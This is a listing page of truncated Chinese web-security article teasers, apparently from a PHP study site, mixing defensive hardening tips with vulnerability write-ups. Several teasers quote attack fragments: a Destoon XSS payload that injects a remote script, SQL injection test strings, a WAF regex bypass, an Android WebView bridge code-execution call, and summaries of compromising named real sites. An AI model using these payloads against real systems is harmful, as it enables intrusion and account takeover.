浅谈如何保证discuz插件安全 - 网站安全 - 自学p关注热度:20

1 非直接执行程序请加上if(!defined( IN_DISCUZ )) {exit( Access Denied );}2 记得过滤 比如说uid等id需要intval过滤,避免溢出 文字内容需要htmlspecialchars过滤避免内容变形(DZ内为dhtmlspecialc..[详情]

destoon新版短消息中心xss指谁打谁 - 网站安全 - 自关注热度:35

首先选取一个对象我们去发消息然后抓包，往里面填充我们的xss代码其中的xssimg src=x onerror=s=createElement( 39;script 39;);body appendChild(s);s src= 39;xsscode 39;;然后我们来试着点开该信息，..[详情]

UC浏览器HD版本远程代码执行漏洞 - 网站安全 - 自关注热度:29

浏览器来说这种问题还是需要修补的导出searchBoxJavaBridge_好像是跟google的搜索框相关的。在android 4 0手机上测试实际存在，4 2以上版本不存在function execute(cmdArgs){return searchBoxJavaBridge_ get..[详情]

Android WebView的Js对象注入漏洞解决方案 - 网站安关注热度:73

目录1使用场景2漏洞描述3漏洞证明4解决方案5一些思考最近在做一个项目过程中，发现了一个很严重的安全漏洞，这个漏洞是乌云平台报告出来的。1，使用场景我们很多时候要使用WebV..[详情]

Webshell下命令执行限制及绕过方法 - 网站安全 -关注热度:27

0times;00前言上传webshell后，执行命令时或许没法执行了，这时我们该分析下原理并想出绕过方式，防守方也必须根据绕过方式想想更强的防御 0times;01 php webshell执行命令原理php webshell（以..[详情]

Mysql语法绕过360scan insert防注入 - 网站安全 - 自学关注热度:54

360scan正则：INSERT s+INTO +?VALUES其实Mysql不只可以用insert into xxx values 插入数据，还可以:insert into xxx set xx =提交：1http: localhost 360 php?sql=insert into user (user,pass)..[详情]

SQL注入测试用例 - 网站安全 - 自学php关注热度:72

看看是什么权限的and 1=(Select IS_MEMBER( db_owner ))And char(124)%2BCast(IS_MEMBER( db_owner ) as varchar(1))%2Bchar(124)=1 ;-- 检测是否有读取某数据库的权限and 1= (Select HAS_DBACC..[详情]

PHPOK#XSS利用突破到GetShell第一发 - 网站安全 - 自学关注热度:24

数据库对存入进行过滤，但是取出来的时候，仍然可利用XSS完成GetShell 在线留言功能里面留言主题在存入数据的时候都进行了过滤数据库内容数据库的字段长度为255，可以写任何的数据..[详情]

Discuz某处XSS劫持UC_KEY（XSS应用详细过程） - 网站关注热度:27

Discuz某处XSS劫持UC_KEY到拿webshell。XSS应用的详细过程。漏洞：这个漏洞的位置在Discuz的门户功能处。在发表文章时，打开编辑源码功能时，写入任意XSS CODE后，再进入和输出都没有过滤。..[详情]

discuz x3.0 20130801版本发表日志可xss(含修复) - 网站关注热度:34

论坛开启日志功能的情况下，发表日志，在引入网络图片时可以实现xss。一、详细说明：1、论坛开启日志功能。2、用户登录后打开日志功能。3、发表日志，在引入网络图片时可以实现..[详情]

ThinkPHP3.1 安全快速入门 - 网站安全 - 自学php关注热度:32

对于WEB应用来说，SQL注入攻击无疑是首要防范的安全问题，系统底层对于数据安全方面本身进行了很多的处理和相应的防范机制，例如： $U..[详情]

打掉安卓手机木马的老窝 - 网站安全 - 自学php关注热度:30

今天在群里面有人发了个安卓手机短信拦截的木马给我。问我需不需要购买。于是骗来测试。。首先逆向之，发现了个URL，于是渗透开始这个是首页 伪装成一个傻逼站点我们继续看 通过..[详情]

Discuz! X 某 XSS - 网站安全 - 自学php关注热度:42

Self XSS + Click Jacking == 存储型 XSShttp: hi baidu com hacklele admin php?frames=yesaction=moderateoperation=threads，页面内有个隐藏表单title，可以GET 提交，管理点击『提交』后触发。由..[详情]

看我如何拿下百度杯 - 网站安全 - 自学php关注热度:37

好吧，我说的是拿下百度杯的网站。查看了下bctf cn域名邮箱是bctf2013@163 com找回密码问题没有设置，应该是新创建的，安全意识肯定不好于是乎组合密码www bctf cn bctf2013 bctf2014 bctf cn密码..[详情]

Discuz! X3.1 刷分系列漏洞 - 网站安全 - 自学php关注热度:38

Discuz!X最新版本（及部分旧版本所存在的刷分漏洞）今天论坛有个用户积分突然涨了特别多，一查日志，发现是以前在旧版发现的一个刷分洞。原本以为早就修复了，没想到还存在，那就..[详情]

某站点安全漏洞分析与建议报告 - 网站安全 - 自关注热度:26

前两天应上司的要求对公司某频道做了日志的分析备注：xxx代表某域名或某信息一、日志记录分析漏洞 1 ：文件上传漏洞危险等级：非常严重通过日志分析，发现黑客在 2014 年 2 月 22 日..[详情]

.net 跨站脚本攻击（XSS）漏洞的解决方案 - 网站安关注热度:54

net 跨站脚本攻击（XSS）漏洞的解决方案描述：1 跨站脚本攻击就是指恶意攻击者向网页中插入一段恶意代码，当用户浏览该网页时，嵌入到网页中的恶意代码就会被执行。一般用来盗取..[详情]

COLDFUSION(CVE-2010-2861) 本地包含利用方法 - 网站安全关注热度:30

最近看老外的一篇文章说，CVE-2010-2861这个利用方法，只有看到过通过读取password properties里的password字段，破解SHA-1值登陆后台，或者通过传递哈希登陆后台的，还没见过能直接得到SHEL..[详情]

SQL盲注攻击的简单介绍 - 网站安全 - 自学php关注热度:22

1 简介1 1 普通SQL注入技术概述目前没有对SQL注入技术的标准定义,微软中国技术中心从2个方面进行了描述[1]:(1) 脚本注入式的攻击(2) 恶意用户输入用来影响被执行的SQL脚本根据Chris Anley的..[详情]

渗透网站的一个过程 - 网站安全 - 自学php关注热度:27

很久没写过文章，对于网站渗透我也不是很在行。给大家分享分享下吧，拿一个站的过程。个人口才不好，讲究着看吧。目标站是帝国系统，基本上没什么洞，幸运的是默认后台并没有..[详情]

豆瓣某栏目存储型XSS - 网站安全 - 自学php关注热度:23

豆瓣电影--电影问答--回应某问题的答案处无过滤，导致XSS地址在这里：http: movie douban com subject 1793929 questions 1680 ?from=question_hot_all缺陷代码在最后一行。选中第一个答案点击回应，即可弹..[详情]

WordPress 3.8.2 cookie伪造漏洞再分析 - 网站安全 - 自关注热度:26

0x00 背景看了WordPress 3 8 2补丁分析 HMAC timing attack，眼界大开，原来还可以利用时间差来判断HMAC。但我总觉得这个漏洞并不是简单的修复这个问题。查看了官方提供的资料:该漏洞是由Wo..[详情]

WordPress 3.8.2补丁分析 HMAC timing attack - 网站安全关注热度:22

author: anthrax@insight-labs org0x00 背景在github翻来覆去看了半天，官方版的diff只在php里改动了一个位置: 1..[详情]

N点虚拟主机管理系统密码破解方法 - 网站安全关注热度:30

N点虚拟主机加密方式是他自定义的函数，封装到了DLL里面，你在N点主机管理系统的目录新建一个ASP文件内容如下!-- include file=inc conn asp--!ndash; include file=inc siteinfo aspndash;!ndash;..[详情]

php强制转换类型和CMS远程管理插件的危险 - 网站关注热度:33

远程管理插件是十分受WordPress站点管理员欢迎的工具，它们允许用户同时对多个站点执行相同的操作，如，更新到最新的发行版或安装插件。然而，为了实现这些操作，客户端插件需要..[详情]

PhpMyAdmin漏洞利用总结With Metasploit - 网站安全 - 自关注热度:89

一： 影响版本：3 5 x 3 5 8 1 and 4 0 0 4 0 0-rc3概述：PhpMyAdmin存在PREG_REPLACE_EVAL漏洞利用模块：exploit multi http phpmyadmin_preg_replaceCVE: CVE-2013-3238二： 影响版本：phpMyAdmi..[详情]

安踏商城任意文件读取 - 网站安全 - 自学php关注热度:23

安踏商城文件包含漏洞在测试安全问题的时候，发现了某处存在文件包含漏洞，而且权限很高为root权限。首先确定环境。大小写法。www anta com index php正常访问。www anta com indeX php提示文..[详情]

彩乐乐彩票网任意账号密码修改 - 网站安全 - 自关注热度:18

彩乐乐彩票网任意账号密码修改点击忘记密码为了测试,我预先注册和绑定了下手机。下图是成功修改 admin账号的证明惊喜的是不需要填写手机号码,就可以发验证码，这网站问题貌似还挺..[详情]

浅析白盒审计中的字符编码及SQL注入 - 网站安全关注热度:27

尽管现在呼吁所有的程序都使用unicode编码，所有的网站都使用utf-8编码，来一个统一的国际规范。但仍然有很多，包括国内及国外（特别是非英语国家）的一些cms，仍然使用着自己国家..[详情]

扫描目录下的php文件，是否含有木马特征 - 网站关注热度:37

shell_checkl ! usr bin python -*- encoding:UTF-8 -*- @package @desc 扫描目录下的php文件，是否含有木马特征，注意，不是木马扫描 @useage python shell_check py your web path 1=是否..[详情]